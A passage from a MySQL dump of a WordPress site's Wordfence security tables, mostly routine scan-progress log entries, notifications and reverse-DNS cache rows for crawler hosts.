plugin</a>','[]'),('site-WQBAAAA',1,'wfplugin_updates',502,1567012423,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 3 plugins</a>','[]'),('site-WYBAAAA',1,'wfplugin_scan',502,1567012427,'<a href=\"https://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wpxb_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfpendingissues`
--

DROP TABLE IF EXISTS `wpxb_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfpendingissues`
--

LOCK TABLES `wpxb_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wpxb_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfreversecache`
--

DROP TABLE IF EXISTS `wpxb_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfreversecache`
--

LOCK TABLES `wpxb_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wpxb_wfreversecache` DISABLE KEYS */;
INSERT INTO `wpxb_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-243.googlebot.com',1566977292),('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-241.googlebot.com',1566979927),('\0\0\0\0\0\0\0\0\0\0','165-255-168-132.ip.adsl.co.za',1566987339),('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-244.googlebot.com',1567010261),('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-245.googlebot.com',1566973777),('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-242.googlebot.com',1566957041);
/*!40000 ALTER TABLE `wpxb_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfsnipcache`
--

DROP TABLE IF EXISTS `wpxb_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=1971 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfsnipcache`
--

LOCK TABLES `wpxb_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wpxb_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfstatus`
--

DROP TABLE IF EXISTS `wpxb_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=23170 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfstatus`
--

LOCK TABLES `wpxb_wfstatus` WRITE;
/*!40000 ALTER TABLE `wpxb_wfstatus` DISABLE KEYS */;
INSERT INTO `wpxb_wfstatus` VALUES (22671,1566903558.832915,2,'info','Analyzed 300 files containing 3.7 MB of data so far'),(22672,1566903559.252101,2,'info','Analyzed 400 files containing 6.21 MB of data so far'),(22673,1566903559.939247,2,'info','Analyzed 500 files containing 6.97 MB of data so far'),(22674,1566903567.025099,2,'info','Analyzed 600 files containing 10.86 MB of data so far'),(22675,1566903568.027929,2,'info','Analyzed 700 files containing 16.15 MB of data so far'),(22709,1566903581.226063,2,'info','Analyzed 4100 files containing 54.54 MB of data so far'),(22710,1566903581.845939,2,'info','Analyzed 4200 files containing 56.28 MB of data so far'),(22711,1566903585.558933,2,'info','Analyzed 4300 files containing 57.2 MB of data so far'),(22712,1566903585.707956,2,'info','Analyzed 4400 files containing 58.3 MB of data so far'),(22713,1566903585.845223,2,'info','Analyzed 4500 files containing 59.37 MB of data so far'),(22714,1566903586.080699,2,'info','Analyzed 4600 files containing 60.4 MB of data so far'),(22715,1566903586.217847,2,'info','Analyzed 4700 files containing 61.03 MB of data so far'),(22716,1566903586.351056,2,'info','Analyzed 4800 files containing 61.84 MB of data so far'),(22717,1566903586.644916,2,'info','Analyzed 4900 files containing 63 MB of data so far'),(22718,1566903586.867204,2,'info','Analyzed 5000 files containing 63.95 MB of data so far'),(22288,1566807597.085756,2,'info','500 files indexed'),(22289,1566807597.731316,2,'info','1000 files indexed'),(22290,1566807598.238233,2,'info','1500 files indexed'),(22291,1566807598.546428,2,'info','2000 files indexed'),(22292,1566807598.798942,2,'info','2500 files indexed'),(22719,1566903587.002334,2,'info','Analyzed 5100 files containing 64.26 MB of data so far'),(22720,1566903587.131802,2,'info','Analyzed 5200 files containing 64.52 MB of data so far'),(22721,1566903588.582309,2,'info','Analyzed 5300 files containing 72.52 MB of data so far'),(22722,1566903588.794408,2,'info','Analyzed 5400 files containing 73.55 MB of data so far'),(22723,1566903588.921252,2,'info','Analyzed 5500 files containing 73.72 MB of data so far'),(22724,1566903589.166403,2,'info','Analyzed 5600 files containing 74.86 MB of data so far'),(22725,1566903589.743788,2,'info','Analyzed 5700 files containing 77.81 MB of data so far'),(22726,1566903589.872563,2,'info','Analyzed 5800 files containing 77.93 MB of data so far'),(22727,1566903594.460805,2,'info','Analyzed 5900 files containing 104.37 MB of data so far'),(22728,1566903594.918187,2,'info','Analyzed 6000 files containing 105.08 MB of data so far'),(22729,1566903595.358140,2,'info','Analyzed 6100 files containing 106.76 MB of data so far'),(22730,1566903596.220520,2,'info','Analyzed 6200 files containing 111.73 MB of data so far'),(22731,1566903596.398703,2,'info','Analyzed 6300 files containing 113.99 MB of data so far'),(22732,1566903596.580721,2,'info','Analyzed 6400 files containing 114.72 MB of data so far'),(22733,1566903596.793465,2,'info','Analyzed 6500 files containing 116.02 MB of data so far'),(22734,1566903596.911191,2,'info','Analyzed 6600 files containing 116.56 MB of data so far'),(22735,1566903597.191885,2,'info','Analyzed 6700 files containing 117.92 MB of data so far'),(22736,1566903597.514185,2,'info','Analyzed 6800 files containing 119.42 MB of data so far'),(22737,1566903597.763378,2,'info','Analyzed 6900 files containing 121.11 MB of data so far'),(22738,1566903598.761250,2,'info','Analyzed 7000 files containing 126.83 MB of data so far'),(22739,1566903599.144198,2,'info','Analyzed 7100 files containing 128.86 MB of data so far'),(22740,1566903599.489105,2,'info','Analyzed 7200 files containing 130.44 MB of data so far'),(22741,1566903599.784319,2,'info','Analyzed 7300 files containing 131.6 MB of data so far'),(22742,1566903600.205907,2,'info','Analyzed 7400 files containing 133.55 MB of data so far'),(22743,1566903600.917439,2,'info','Analyzed 7500 files containing 137.18 MB of data so far'),(22744,1566903607.711932,2,'info','Analyzed 7600 files containing 140.44 MB of data so far'),(22745,1566903608.235760,2,'info','Analyzed 7700 files containing 142.51 MB of data so far'),(22746,1566903608.872291,2,'info','Analyzed 7800 files containing 145.15 MB of data so far'),(22747,1566903609.395215,2,'info','Analyzed 7900 files containing 146.88 MB of data so far'),(22888,1566903790.440254,2,'info','Scanned contents of 2199 additional files at 12.78 per second'),(22889,1566903791.461396,2,'info','Scanned contents of 2230 additional files at 12.88 per second'),(22890,1566903792.465422,2,'info','Scanned contents of 2266 additional files at 13.01 per second'),(22891,1566903793.466421,2,'info','Scanned contents of 2300 additional files at 13.13 per second'),(22892,1566903794.491772,2,'info','Scanned contents of 2331 additional files at 13.23 per second'),(22893,1566903795.560756,2,'info','Scanned contents of 2350 additional files at 13.26 per second'),(22254,1566807589.689432,1,'info','Contacting Wordfence to initiate scan'),(22699,1566903578.628921,2,'info','Analyzed 3100 files containing 46.09 MB of data so far'),(22431,1566807717.507701,2,'info','Scanned contents of 156 additional files at 2.68 per second'),(22252,1566807587.097343,1,'info','Scheduled Wordfence scan starting at Monday 26th of August 2019 10:19:47 AM'),(22250,1566753921.470406,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22248,1566753921.469723,1,'info','-------------------'),(22249,1566753921.470239,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 82.5 MB'),(22432,1566807718.601508,2,'info','Scanned contents of 170 additional files at 2.87 per second'),(22433,1566807719.601752,2,'info','Scanned contents of 185 additional files at 3.07 per second'),(22698,1566903578.213678,2,'info','Analyzed 3000 files containing 45.33 MB of data so far'),(22697,1566903577.428745,2,'info','Analyzed 2900 files containing 42.66 MB of data so far'),(22243,1566753921.333096,1,'info','Initiating quick scan'),(22696,1566903576.847914,2,'info','Analyzed 2800 files containing 39.78 MB of data so far'),(22218,1566575389.373044,1,'info','-------------------'),(22219,1566575389.373835,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 82.5 MB'),(22220,1566575389.374115,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22223,1566661395.496851,1,'info','Initiating quick scan'),(22228,1566661395.533994,1,'info','-------------------'),(22229,1566661395.534880,2,'info','Wordfence used 2 MB of memory for scan. Server peak memory usage was: 82.5 MB'),(22230,1566661395.535065,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22233,1566665902.460822,1,'info','Initiating quick scan'),(22238,1566665902.500934,1,'info','-------------------'),(22239,1566665902.501572,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 82.5 MB'),(22240,1566665902.501818,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22658,1566903556.830103,2,'info','4000 files indexed'),(22656,1566903556.542017,2,'info','3000 files indexed'),(22657,1566903556.674046,2,'info','3500 files indexed'),(22654,1566903555.992377,2,'info','2000 files indexed'),(22655,1566903556.211435,2,'info','2500 files indexed'),(22652,1566903555.440433,2,'info','1000 files indexed'),(22653,1566903555.695884,2,'info','1500 files indexed'),(22651,1566903554.770286,2,'info','500 files indexed'),(22650,1566903554.655488,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(22649,1566903554.652716,10,'info','SUM_START:Scanning for known malware files'),(22648,1566903554.651320,10,'info','SUM_DISABLED:Skipping plugin scan'),(22647,1566903554.650936,10,'info','SUM_DISABLED:Skipping theme scan'),(22646,1566903554.648565,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(22645,1566903554.645614,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(22644,1566903554.644330,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(22435,1566807723.750631,2,'info','Scanned contents of 228 additional files at 3.54 per second'),(22434,1566807722.749685,2,'info','Scanned contents of 195 additional files at 3.07 per second'),(22659,1566903556.884925,2,'info','4500 files indexed'),(22660,1566903557.069225,2,'info','5000 files indexed'),(22661,1566903557.185492,2,'info','5500 files indexed'),(22662,1566903557.259620,2,'info','6000 files indexed'),(22663,1566903557.311608,2,'info','6500 files indexed'),(22664,1566903557.517809,2,'info','7000 files indexed'),(22665,1566903557.889271,2,'info','7500 files indexed'),(22666,1566903557.945090,2,'info','8000 files indexed'),(22667,1566903558.009028,2,'info','8500 files indexed'),(22668,1566903558.016916,2,'info','8587 files indexed'),(22669,1566903558.308222,2,'info','Analyzed 100 files containing 1.32 MB of data so far'),(22670,1566903558.574933,2,'info','Analyzed 200 files containing 2.5 MB of data so far'),(22311,1566807602.744086,2,'info','Analyzed 600 files containing 10.87 MB of data so far'),(22310,1566807602.020004,2,'info','Analyzed 500 files containing 6.97 MB of data so far'),(22309,1566807601.810241,2,'info','Analyzed 400 files containing 6.21 MB of data so far'),(22308,1566807601.459544,2,'info','Analyzed 300 files containing 3.7 MB of data so far'),(22307,1566807601.216707,2,'info','Analyzed 200 files containing 2.5 MB of data so far'),(22306,1566807600.976122,2,'info','Analyzed 100 files containing 1.32 MB of data so far'),(22304,1566807600.711742,2,'info','8500 files indexed'),(22305,1566807600.713909,2,'info','8575 files indexed'),(22880,1566903778.033196,2,'info','Scanned contents of 2018 additional files at 12.64 per second'),(22879,1566903777.017101,2,'info','Scanned contents of 1997 additional files at 12.59 per second'),(22878,1566903776.002510,2,'info','Scanned contents of 1979 additional files at 12.55 per second'),(22877,1566903774.912674,2,'info','Scanned contents of 1965 additional files at 12.55 per second'),(22700,1566903579.291473,2,'info','Analyzed 3200 files containing 46.98 MB of data so far'),(22701,1566903579.424723,2,'info','Analyzed 3300 files containing 47.29 MB of data so far'),(22428,1566807714.349822,2,'info','Scanned contents of 124 additional files at 2.25 per second'),(22702,1566903579.569865,2,'info','Analyzed 3400 files containing 47.45 MB of data so far'),(22430,1566807716.499493,2,'info','Scanned contents of 145 additional files at 2.54 per second'),(22429,1566807715.407773,2,'info','Scanned contents of 136 additional files at 2.42 per second'),(22436,1566807724.763634,2,'info','Scanned contents of 271 additional files at 4.14 per second'),(22261,1566807596.140024,2,'info','Starting DNS scan for companyregistration.online'),(22437,1566807725.779374,2,'info','Scanned contents of 300 additional files at 4.51 per second'),(22438,1566807726.792610,2,'info','Scanned contents of 325 additional files at 4.82 per second'),(22439,1566807727.804645,2,'info','Scanned contents of 362 additional files at 5.29 per second'),(22440,1566807728.806848,2,'info','Scanned contents of 379 additional files at 5.45 per second'),(22441,1566807729.817475,2,'info','Scanned contents of 416 additional files at 5.90 per second'),(22442,1566807730.836838,2,'info','Scanned contents of 452 additional files at 6.32 per second'),(22443,1566807731.906081,2,'info','Scanned contents of 494 additional files at 6.80 per second'),(22444,1566807732.963630,2,'info','Scanned contents of 525 additional files at 7.13 per second'),(22445,1566807733.968774,2,'info','Scanned contents of 563 additional files at 7.54 per second'),(22446,1566807734.971701,2,'info','Scanned contents of 602 additional files at 7.96 per second'),(22447,1566807735.996462,2,'info','Scanned contents of 635 additional files at 8.28 per second'),(22448,1566807736.997739,2,'info','Scanned contents of 680 additional files at 8.75 per second'),(22449,1566807741.847256,2,'info','Scanned contents of 696 additional files at 8.43 per second'),(22450,1566807742.886193,2,'info','Scanned contents of 710 additional files at 8.50 per second'),(22451,1566807743.892994,2,'info','Scanned contents of 736 additional files at 8.70 per second'),(22452,1566807744.939160,2,'info','Scanned contents of 756 additional files at 8.83 per second'),(22453,1566807745.951373,2,'info','Scanned contents of 798 additional files at 9.21 per second'),(22454,1566807746.968763,2,'info','Scanned contents of 841 additional files at 9.59 per second'),(22455,1566807747.980888,2,'info','Scanned contents of 884 additional files at 9.97 per second'),(22456,1566807748.986645,2,'info','Scanned contents of 927 additional files at 10.34 per second'),(22457,1566807749.997985,2,'info','Scanned contents of 965 additional files at 10.64 per second'),(22458,1566807750.998245,2,'info','Scanned contents of 989 additional files at 10.79 per second'),(22459,1566807752.023578,2,'info','Scanned contents of 1011 additional files at 10.90 per second'),(22460,1566807753.045271,2,'info','Scanned contents of 1043 additional files at 11.13 per second'),(22461,1566807754.179362,2,'info','Scanned contents of 1069 additional files at 11.27 per second'),(22462,1566807755.396265,2,'info','Scanned contents of 1092 additional files at 11.36 per second'),(22463,1566807756.542504,2,'info','Scanned contents of 1105 additional files at 11.36 per second'),(22464,1566807762.516516,2,'info','Scanned contents of 1106 additional files at 10.72 per second'),(22465,1566807763.941598,2,'info','Scanned contents of 1114 additional files at 10.65 per second'),(22466,1566807764.946282,2,'info','Scanned contents of 1144 additional files at 10.83 per second'),(22467,1566807766.023719,2,'info','Scanned contents of 1157 additional files at 10.84 per second'),(22468,1566807767.145682,2,'info','Scanned contents of 1161 additional files at 10.77 per second'),(22469,1566807768.173580,2,'info','Scanned contents of 1167 additional files at 10.72 per second'),(22470,1566807769.436917,2,'info','Scanned contents of 1170 additional files at 10.62 per second'),(22471,1566807770.452497,2,'info','Scanned contents of 1194 additional files at 10.74 per second'),(22472,1566807771.468292,2,'info','Scanned contents of 1210 additional files at 10.79 per second'),(22473,1566807772.518817,2,'info','Scanned contents of 1237 additional files at 10.93 per second'),(22474,1566807773.815022,2,'info','Scanned contents of 1259 additional files at 11.00 per second'),(22475,1566807774.928146,2,'info','Scanned contents of 1267 additional files at 10.96 per second'),(22476,1566807779.161567,2,'info','Scanned contents of 1272 additional files at 10.61 per second'),(22477,1566807780.173671,2,'info','Scanned contents of 1292 additional files at 10.69 per second'),(22478,1566807781.221877,2,'info','Scanned contents of 1307 additional files at 10.72 per second'),(22479,1566807782.388810,2,'info','Scanned contents of 1316 additional files at 10.69 per second'),(22480,1566807783.441927,2,'info','Scanned contents of 1322 additional files at 10.65 per second'),(22481,1566807784.478441,2,'info','Scanned contents of 1343 additional files at 10.73 per second'),(22482,1566807785.488345,2,'info','Scanned contents of 1372 additional files at 10.87 per second'),(22483,1566807786.515181,2,'info','Scanned contents of 1422 additional files at 11.18 per second'),(22484,1566807787.526799,2,'info','Scanned contents of 1464 additional files at 11.42 per second'),(22485,1566807788.529669,2,'info','Scanned contents of 1505 additional files at 11.65 per second'),(22486,1566807789.563834,2,'info','Scanned contents of 1526 additional files at 11.72 per second'),(22262,1566807596.152850,2,'info','Scanning DNS A record for companyregistration.online'),(22703,1566903579.768947,2,'info','Analyzed 3500 files containing 48.19 MB of data so far'),(22704,1566903580.311949,2,'info','Analyzed 3600 files containing 50.87 MB of data so far'),(22705,1566903580.450597,2,'info','Analyzed 3700 files containing 51.31 MB of data so far'),(22263,1566807596.154461,2,'info','Scanning DNS MX record for companyregistration.online'),(22266,1566807596.161363,2,'info','Total disk space: 18.11 TB -- Free disk space: 192.04 GB'),(22487,1566807790.590238,2,'info','Scanned contents of 1562 additional files at 11.90 per second'),(22488,1566807791.608261,2,'info','Scanned contents of 1587 additional files at 12.00 per second'),(22489,1566807792.901570,2,'info','Scanned contents of 1610 additional files at 12.05 per second'),(22490,1566807793.937638,2,'info','Scanned contents of 1631 additional files at 12.11 per second'),(22491,1566807796.572939,2,'info','Scanned contents of 1633 additional files at 11.90 per second'),(22624,1566903553.471506,2,'info','Starting DNS scan for companyregistration.online'),(22623,1566903553.468742,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(22621,1566903551.210258,10,'info','SUM_START:Checking for the most secure way to get IPs'),(22622,1566903553.460770,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(22625,1566903553.491468,2,'info','Scanning DNS A record for companyregistration.online'),(22626,1566903553.492962,2,'info','Scanning DNS MX record for companyregistration.online'),(22627,1566903553.493942,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(22882,1566903784.318741,2,'info','Scanned contents of 2050 additional files at 12.35 per second'),(22881,1566903783.278793,2,'info','Scanned contents of 2031 additional files at 12.31 per second'),(22629,1566903553.505391,2,'info','Total disk space: 18.11 TB -- Free disk space: 1.15 TB'),(22628,1566903553.502206,10,'info','SUM_START:Scanning to check available disk space'),(22630,1566903553.505737,2,'info','The disk has 1209175.18 MB available'),(22631,1566903553.506002,10,'info','SUM_ENDOK:Scanning to check available disk space'),(22632,1566903553.512217,10,'info','SUM_START:Checking Web Application Firewall status'),(22633,1566903553.515265,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(22643,1566903554.640598,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(22642,1566903554.637206,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(22641,1566903554.633290,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(22639,1566903553.542351,2,'info','Found 5 themes'),(22640,1566903553.559489,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(22638,1566903553.540906,2,'info','Getting theme list from WordPress'),(22637,1566903553.540657,2,'info','Found 26 plugins'),(22635,1566903553.524915,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(22636,1566903553.530251,2,'info','Getting plugin list from WordPress'),(22634,1566903553.522257,10,'info','SUM_START:Checking for future GeoIP support'),(22695,1566903575.662797,2,'info','Analyzed 2700 files containing 35.72 MB of data so far'),(22694,1566903575.500468,2,'info','Analyzed 2600 files containing 35.28 MB of data so far'),(22213,1566575389.327296,1,'info','Initiating quick scan'),(22693,1566903575.096715,2,'info','Analyzed 2500 files containing 34.46 MB of data so far'),(22692,1566903574.625706,2,'info','Analyzed 2400 files containing 33.05 MB of data so far'),(22894,1566903796.562045,2,'info','Scanned contents of 2370 additional files at 13.30 per second'),(22895,1566903797.609208,2,'info','Scanned contents of 2393 additional files at 13.35 per second'),(22896,1566903798.610751,2,'info','Scanned contents of 2418 additional files at 13.41 per second'),(22897,1566903803.117846,2,'info','Scanned contents of 2429 additional files at 13.15 per second'),(22898,1566903804.187425,2,'info','Scanned contents of 2442 additional files at 13.14 per second'),(22899,1566903805.208338,2,'info','Scanned contents of 2469 additional files at 13.21 per second'),(22900,1566903806.235004,2,'info','Scanned contents of 2501 additional files at 13.31 per second'),(22901,1566903807.278828,2,'info','Scanned contents of 2533 additional files at 13.41 per second'),(22902,1566903808.296234,2,'info','Scanned contents of 2560 additional files at 13.48 per second'),(22903,1566903809.310344,2,'info','Scanned contents of 2589 additional files at 13.56 per second'),(22904,1566903810.336083,2,'info','Scanned contents of 2631 additional files at 13.70 per second'),(22905,1566903811.357040,2,'info','Scanned contents of 2653 additional files at 13.75 per second'),(22906,1566903812.406787,2,'info','Scanned contents of 2673 additional files at 13.77 per second'),(22907,1566903813.505090,2,'info','Scanned contents of 2686 additional files at 13.76 per second'),(22908,1566903814.509126,2,'info','Scanned contents of 2702 additional files at 13.77 per second'),(22909,1566903815.515235,2,'info','Scanned contents of 2726 additional files at 13.83 per second'),(22910,1566903816.536190,2,'info','Scanned contents of 2750 additional files at 13.88 per second'),(22911,1566903817.661196,2,'info','Scanned contents of 2764 additional files at 13.87 per second'),(22912,1566903818.689401,2,'info','Scanned contents of 2771 additional files at 13.83 per second'),(22913,1566903823.563687,2,'info','Scanned contents of 2773 additional files at 13.51 per second'),(22914,1566903824.862236,2,'info','Scanned contents of 2785 additional files at 13.49 per second'),(22915,1566903825.894309,2,'info','Scanned contents of 2819 additional files at 13.58 per second'),(22916,1566903827.135323,2,'info','Scanned contents of 2848 additional files at 13.64 per second'),(22917,1566903828.737237,2,'info','Scanned contents of 2850 additional files at 13.55 per second'),(22918,1566903829.970241,2,'info','Scanned contents of 2862 additional files at 13.52 per second'),(22919,1566903831.067393,2,'info','Scanned contents of 2872 additional files at 13.50 per second'),(22427,1566807713.348335,2,'info','Scanned contents of 107 additional files at 1.98 per second'),(22920,1566903832.071934,2,'info','Scanned contents of 2890 additional files at 13.52 per second'),(22921,1566903833.105800,2,'info','Scanned contents of 2907 additional files at 13.54 per second'),(22267,1566807596.161557,2,'info','The disk has 196649.36 MB available'),(22706,1566903580.799793,2,'info','Analyzed 3800 files containing 53.04 MB of data so far'),(22707,1566903580.949788,2,'info','Analyzed 3900 files containing 53.72 MB of data so far'),(22922,1566903834.113350,2,'info','Scanned contents of 2923 additional files at 13.55 per second'),(22923,1566903835.162689,2,'info','Scanned contents of 2946 additional files at 13.59 per second'),(22924,1566903836.193345,2,'info','Scanned contents of 2970 additional files at 13.63 per second'),(22691,1566903573.922631,2,'info','Analyzed 2300 files containing 30.26 MB of data so far'),(22684,1566903570.857183,2,'info','Analyzed 1600 files containing 22.57 MB of data so far'),(22685,1566903571.386500,2,'info','Analyzed 1700 files containing 23.85 MB of data so far'),(22686,1566903571.874196,2,'info','Analyzed 1800 files containing 24.96 MB of data so far'),(22687,1566903572.329745,2,'info','Analyzed 1900 files containing 26.22 MB of data so far'),(22688,1566903572.658005,2,'info','Analyzed 2000 files containing 27.09 MB of data so far'),(22689,1566903573.086996,2,'info','Analyzed 2100 files containing 27.74 MB of data so far'),(22690,1566903573.474539,2,'info','Analyzed 2200 files containing 29.03 MB of data so far'),(22925,1566903837.232229,2,'info','Scanned contents of 3004 additional files at 13.72 per second'),(22926,1566903841.140116,2,'info','Scanned contents of 3028 additional files at 13.59 per second'),(22927,1566903842.177602,2,'info','Scanned contents of 3038 additional files at 13.57 per second'),(22928,1566903843.206011,2,'info','Scanned contents of 3055 additional files at 13.59 per second'),(22929,1566903844.210910,2,'info','Scanned contents of 3077 additional files at 13.62 per second'),(22930,1566903845.229742,2,'info','Scanned contents of 3092 additional files at 13.63 per second'),(22931,1566903846.250067,2,'info','Scanned contents of 3120 additional files at 13.69 per second'),(22932,1566903847.305684,2,'info','Scanned contents of 3128 additional files at 13.66 per second'),(22933,1566903848.336021,2,'info','Scanned contents of 3139 additional files at 13.65 per second'),(22934,1566903850.405979,2,'info','Scanned contents of 3143 additional files at 13.54 per second'),(22935,1566903851.963686,2,'info','Scanned contents of 3155 additional files at 13.51 per second'),(22312,1566807603.615718,2,'info','Analyzed 700 files containing 15.55 MB of data so far'),(22313,1566807603.850136,2,'info','Analyzed 800 files containing 16.5 MB of data so far'),(22314,1566807603.992684,2,'info','Analyzed 900 files containing 17.32 MB of data so far'),(22315,1566807604.114804,2,'info','Analyzed 1000 files containing 17.76 MB of data so far'),(22316,1566807604.348478,2,'info','Analyzed 1100 files containing 18.22 MB of data so far'),(22317,1566807604.562711,2,'info','Analyzed 1200 files containing 19.04 MB of data so far'),(22318,1566807604.833452,2,'info','Analyzed 1300 files containing 20.11 MB of data so far'),(22319,1566807604.958301,2,'info','Analyzed 1400 files containing 20.47 MB of data so far'),(22320,1566807605.072537,2,'info','Analyzed 1500 files containing 20.74 MB of data so far'),(22321,1566807605.397138,2,'info','Analyzed 1600 files containing 21.97 MB of data so far'),(22322,1566807605.668325,2,'info','Analyzed 1700 files containing 23.22 MB of data so far'),(22323,1566807605.902133,2,'info','Analyzed 1800 files containing 24.41 MB of data so far'),(22324,1566807616.722598,2,'info','Analyzed 1900 files containing 25.65 MB of data so far'),(22325,1566807617.182351,2,'info','Analyzed 2000 files containing 26.44 MB of data so far'),(22326,1566807617.416854,2,'info','Analyzed 2100 files containing 27.07 MB of data so far'),(22327,1566807617.784470,2,'info','Analyzed 2200 files containing 28.44 MB of data so far'),(22328,1566807618.125626,2,'info','Analyzed 2300 files containing 29.79 MB of data so far'),(22329,1566807618.772599,2,'info','Analyzed 2400 files containing 32.83 MB of data so far'),(22330,1566807619.184977,2,'info','Analyzed 2500 files containing 33.79 MB of data so far'),(22331,1566807619.510017,2,'info','Analyzed 2600 files containing 34.87 MB of data so far'),(22332,1566807619.722234,2,'info','Analyzed 2700 files containing 35.1 MB of data so far'),(22333,1566807620.529694,2,'info','Analyzed 2800 files containing 39.1 MB of data so far'),(22334,1566807621.287382,2,'info','Analyzed 2900 files containing 42.24 MB of data so far'),(22335,1566807621.840213,2,'info','Analyzed 3000 files containing 44.86 MB of data so far'),(22336,1566807622.071989,2,'info','Analyzed 3100 files containing 45.44 MB of data so far'),(22337,1566807622.376566,2,'info','Analyzed 3200 files containing 46.3 MB of data so far'),(22338,1566807622.615458,2,'info','Analyzed 3300 files containing 46.61 MB of data so far'),(22339,1566807623.170153,2,'info','Analyzed 3400 files containing 46.78 MB of data so far'),(22340,1566807624.083510,2,'info','Analyzed 3500 files containing 47.92 MB of data so far'),(22341,1566807625.269743,2,'info','Analyzed 3600 files containing 50.21 MB of data so far'),(22342,1566807626.041345,2,'info','Analyzed 3700 files containing 50.65 MB of data so far'),(22343,1566807626.622649,2,'info','Analyzed 3800 files containing 52.46 MB of data so far'),(22344,1566807627.034641,2,'info','Analyzed 3900 files containing 53.05 MB of data so far'),(22345,1566807627.222835,2,'info','Analyzed 4000 files containing 53.21 MB of data so far'),(22346,1566807627.490014,2,'info','Analyzed 4100 files containing 54.07 MB of data so far'),(22347,1566807627.872265,2,'info','Analyzed 4200 files containing 55.79 MB of data so far'),(22348,1566807628.104051,2,'info','Analyzed 4300 files containing 56.64 MB of data so far'),(22349,1566807628.278015,2,'info','Analyzed 4400 files containing 57.69 MB of data so far'),(22350,1566807628.437315,2,'info','Analyzed 